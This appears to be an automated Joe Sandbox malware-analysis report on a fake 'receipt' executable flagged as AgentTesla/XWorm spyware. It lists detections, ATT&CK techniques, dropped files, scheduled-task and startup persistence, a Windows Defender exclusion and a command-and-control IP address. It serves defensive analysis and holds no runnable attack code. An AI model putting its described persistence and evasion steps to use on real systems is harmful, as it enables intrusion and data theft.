            Source: Yara matchFile source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Receipt-#202431029B.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: XetHVID.exe PID: 8064, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: XetHVID.exe PID: 5260, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b7c8f4.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b7c8f4.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.256e6f0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.257fa9c.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b8fa44.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 13.2.XetHVID.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.257fa9c.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.XetHVID.exe.2b8fa44.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.Receipt-#202431029B.exe.256e6f0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.1750667088.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1724608978.0000000002B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Receipt-#202431029B.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: XetHVID.exe PID: 8064, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: XetHVID.exe PID: 5260, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            Scheduled Task/Job            		111
            Process Injection            		1
            Masquerading            		1
            Input Capture            		231
            Security Software Discovery            		Remote Services1
            Input Capture            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		2
            Registry Run Keys / Startup Folder            		1
            Scheduled Task/Job            		11
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading            		2
            Registry Run Keys / Startup Folder            		141
            Virtualization/Sandbox Evasion            		Security Account Manager141
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Clipboard Data            		1
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading            		111
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
            Obfuscated Files or Information            		Cached Domain Credentials13
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582779 Sample: Receipt-#202431029B.exe Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 15 other signatures 2->60 7 Receipt-#202431029B.exe 7 2->7         started        11 XetHVID.exe 2->11         started        process3 file4 40 C:\Users\user\AppData\Roaming\XetHVID.exe, PE32 7->40 dropped 42 C:\Users\user\...\XetHVID.exe:Zone.Identifier, ASCII 7->42 dropped 44 C:\Users\user\AppData\Local\...\tmp2668.tmp, XML 7->44 dropped 46 C:\Users\user\...\Receipt-#202431029B.exe.log, ASCII 7->46 dropped 62 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 7->62 64 Uses schtasks.exe or at.exe to add and modify task schedules 7->64 66 Adds a directory exclusion to Windows Defender 7->66 13 Receipt-#202431029B.exe 6 7->13         started        17 powershell.exe 23 7->17         started        20 powershell.exe 23 7->20         started        22 schtasks.exe 1 7->22         started        68 Multi AV Scanner detection for dropped file 11->68 70 Machine Learning detection for dropped file 11->70 72 Injects a PE file into a foreign processes 11->72 24 schtasks.exe 11->24         started        26 XetHVID.exe 11->26         started        signatures5 process6 dnsIp7 50 154.39.0.150, 49735, 49736, 49742 COGENT-174US United States 13->50 48 C:\Users\user\AppData\Roaming48otepab.exe, PE32 13->48 dropped 28 WerFault.exe 13->28         started        52 Loading BitLocker PowerShell Module 17->52 30 conhost.exe 17->30         started        32 WmiPrvSE.exe 17->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        38 conhost.exe 24->38         started        file8 signatures9 process10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Receipt-#202431029B.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            Receipt-#202431029B.exe43%VirustotalBrowse
            Receipt-#202431029B.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\XetHVID.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Notepab.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Roaming\Notepab.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            C:\Users\user\AppData\Roaming\XetHVID.exe74%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            154.39.0.1500%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            154.39.0.150true
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.apache.org/licenses/LICENSE-2.0Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.fontbureau.comReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.fontbureau.com/designersGReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/?Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.founder.com.cn/cn/bTheReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.fontbureau.com/designers?Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.tiro.comReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.goodfont.co.krReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.carterandcone.comlReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.sajatypeworks.comReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.typography.netDReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/designers/cabarga.htmlNReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/cTheReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.galapagosdesign.com/staff/dennis.htmReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cnReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fontbureau.com/designers/frere-user.htmlReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.jiyu-kobo.co.jp/Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.galapagosdesign.com/DPleaseReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers8Receipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fonts.comReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.sandoll.co.krReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.urwpp.deDPleaseReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.zhongyicts.com.cnReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameReceipt-#202431029B.exe, 00000000.00000002.1669926241.0000000002521000.00000004.00000800.00020000.00000000.sdmp, Receipt-#202431029B.exe, 00000008.00000002.4102389943.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, XetHVID.exe, 00000009.00000002.1724608978.0000000002B31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.sakkal.comReceipt-#202431029B.exe, 00000000.00000002.1681084980.0000000006AD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                154.39.0.150
                                                                		unknownUnited States
                                                                		174COGENT-174UStrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1582779
                                                                Start date and time:2024-12-31 13:28:05 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 9m 9s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:22
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Receipt-#202431029B.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@20/21@0/1
                                                                EGA Information:
                                                                • Successful, ratio: 75%
                                                                HCA Information:
                                                                • Successful, ratio: 98%
                                                                • Number of executed functions: 366
                                                                • Number of non-executed functions: 12
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.12.23.50, 13.107.246.45, 40.126.32.72
                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target XetHVID.exe, PID 5260 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                07:28:53API Interceptor8729105x Sleep call for process: Receipt-#202431029B.exe modified
                                                                07:28:55API Interceptor37x Sleep call for process: powershell.exe modified
                                                                07:28:58API Interceptor17x Sleep call for process: XetHVID.exe modified
                                                                12:28:56Task SchedulerRun new task: XetHVID path: C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                12:29:03AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab.lnk

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                No context

                                                                Domains

                                                                No context

                                                                ASNs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                COGENT-174USarm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3
                                                                m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3
                                                                ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3
                                                                mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3
                                                                debug.dbg.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3
                                                                x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3
                                                                arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3
                                                                sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3
                                                                mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3
                                                                spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                • 38.55.246.3

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                No context

                                                                Created / dropped Files

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DA9.tmp.dmp

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:Mini DuMP crash report, 15 streams, Tue Dec 31 12:32:53 2024, 0x1205a4 type
                                                                Category:dropped
                                                                Size (bytes):370505
                                                                Entropy (8bit):3.6848277277009753
                                                                Encrypted:false
                                                                SSDEEP:3072:Y+uW7MJ1hew7UHT34uEqZQFIyyA/LTgHCfGUUc49drhE:Y+uAMfetz343FIyyATTgPKh
                                                                MD5:94DFF6297644B5C414047A372DEED0BE
                                                                SHA1:8C12C2A13063C53B2D75468126A63420CFC6B30A
                                                                SHA-256:2F98B70B27751F4017C972453CAAC97552F6B9992C3B52867B17A2E22001AD1D
                                                                SHA-512:E8E60C339CC0EEFCD9FAD4F6CC9690515AE709186CDD9D1877C13F80C2F2792852BE5DA8A7C2E17124553EED843B66629454208935F6CACD365825C63FA14258
                                                                Malicious:false
                                                                Preview:MDMP..a..... .......u.sg............4............$..H.......$..../......./...o..........`.......8...........T...........XS...S..........$/...........1..............................................................................eJ.......1......GenuineIntel............T.......D.....sg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER7F8F.tmp.WERInternalMetadata.xml

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):6432
                                                                Entropy (8bit):3.7184687860196703
                                                                Encrypted:false
                                                                SSDEEP:96:RSIU6o7wVetbyAxU/V6/jMYZQxUUaNQE/n3h5aM4UI89bPzxsf4k9rm:R6l7wVeJylV64YZVTprI89b7xsf4kJm
                                                                MD5:80DF393D66E44CC23B02CDEDC05B1EFC
                                                                SHA1:C8CD588CACBA1AB6A22C09A45442943D7FBE6D8D
                                                                SHA-256:A1BBF9A501B20D2BE6DAAAB09BB5EC43EA6C74DA80EBA5E941BA8A97C79BC67A
                                                                SHA-512:750008B2A47907A8051B49EBB8E7C7B2001C70AC2682804FA6220B0AC6F473DA2E1FB22A4434E7F672F54727A44D8C135AC8ED0CE1C1E5F4352508156AE88B69
                                                                Malicious:false
                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.0.4.<./.P.i.

                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER7FBE.tmp.xml

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):4782
                                                                Entropy (8bit):4.477571813430474
                                                                Encrypted:false
                                                                SSDEEP:48:cvIwWl8zsgJg77aI9ndSWpW8VYTYm8M4JMWFcnTL+q8v3kRE8Nydd:uIjfmI79F7V3JuTLKgEeydd
                                                                MD5:5815945E4DDD1C582B371D8F783D401D
                                                                SHA1:56D8758566DEF431C5F6DB95D37D81D8E97371E6
                                                                SHA-256:138AC3506B017D9DD78A91DFE74A6DABA6E9F261F32CB40380843D469D750CE8
                                                                SHA-512:3EE4EB7649EF46B3FDD0769742CA0387D4208DB92FEB934ACE92D4CDAE19D376CAAA08891CA9B74DCD9F1413599958DD03CC94D73EB34977EEDD5F98E3CA8A7D
                                                                Malicious:false
                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="655415" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Receipt-#202431029B.exe.log

                                                                Download File
                                                                Process:C:\Users\user\Desktop\Receipt-#202431029B.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1415
                                                                Entropy (8bit):5.352427679901606
                                                                Encrypted:false
                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                MD5:97AD91F1C1F572C945DA12233082171D
                                                                SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                Malicious:true
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XetHVID.exe.log

                                                                Download File
                                                                Process:C:\Users\user\AppData\Roaming\XetHVID.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):1415
                                                                Entropy (8bit):5.352427679901606
                                                                Encrypted:false
                                                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                                MD5:97AD91F1C1F572C945DA12233082171D
                                                                SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                                SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                                                SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                                                Malicious:false
                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                Download File
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):2232
                                                                Entropy (8bit):5.379736180876081
                                                                Encrypted:false
                                                                SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:tLHyIFKL3IZ2KRH9Ougss
                                                                MD5:84D0B3B07B2FABFD5D0F3E724F41E2CE
                                                                SHA1:8CB94823F1D28AA12678C877E2E1CF0D57CE5C69
                                                                SHA-256:9F2745B3228D5DCFA4E9B4659F5A2A58A3446B7AECD20294BA34BF3A0312E0E3
                                                                SHA-512:DAE272A0BB99FAB9A217FD4B448DE9847795636777DE9BA769A087DA5505BBCD5B5C29EE48C1241735A4F4AC9EF61E393B859C138D1F6244DF317A664D93375F
                                                                Malicious:false
                                                                Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

